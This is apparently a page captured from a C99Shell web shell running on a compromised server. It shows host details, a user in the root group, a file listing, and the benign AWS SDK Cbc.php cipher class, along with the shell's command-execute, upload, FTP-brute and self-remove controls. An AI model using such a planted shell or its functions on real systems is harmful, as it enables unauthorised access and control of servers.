!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/Crypto/Cipher/   drwxr-xr-x
Free 28.8 GB of 117.98 GB (24.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Cbc.php (2.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws\Crypto\Cipher;

use 
\InvalidArgumentException;
use 
\LogicException;

/**
 * An implementation of the CBC cipher for use with an AesEncryptingStream or
 * AesDecrypting stream.
 *
 * This cipher method is deprecated and in maintenance mode - no new updates will be
 * released. Please see https://docs.aws.amazon.com/general/latest/gr/aws_sdk_cryptography.html
 * for more information.
 *
 * @deprecated
 */
class Cbc implements CipherMethod
{
    const 
BLOCK_SIZE 16;

    
/**
     * @var string
     */
    
private $baseIv;

    
/**
     * @var string
     */
    
private $iv;

    
/**
     * @var int
     */
    
private $keySize;

    
/**
     * @param string $iv Base Initialization Vector for the cipher.
     * @param int $keySize Size of the encryption key, in bits, that will be
     *                     used.
     *
     * @throws InvalidArgumentException Thrown if the passed iv does not match
     *                                  the iv length required by the cipher.
     */
    
public function __construct($iv$keySize 256)
    {
        
$this->baseIv $this->iv $iv;
        
$this->keySize $keySize;

        if (
strlen($iv) !== openssl_cipher_iv_length($this->getOpenSslName())) {
            throw new 
InvalidArgumentException('Invalid initialization vector');
        }
    }

    public function 
getOpenSslName()
    {
        return 
"aes-{$this->keySize}-cbc";
    }

    public function 
getAesName()
    {
        return 
'AES/CBC/PKCS5Padding';
    }

    public function 
getCurrentIv()
    {
        return 
$this->iv;
    }

    public function 
requiresPadding()
    {
        return 
true;
    }

    public function 
seek($offset$whence SEEK_SET)
    {
        if (
$offset === && $whence === SEEK_SET) {
            
$this->iv $this->baseIv;
        } else {
            throw new 
LogicException('CBC initialization only support being'
                
' rewound, not arbitrary seeking.');
        }
    }

    public function 
update($cipherTextBlock)
    {
        
$this->iv substr($cipherTextBlockself::BLOCK_SIZE * -1);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--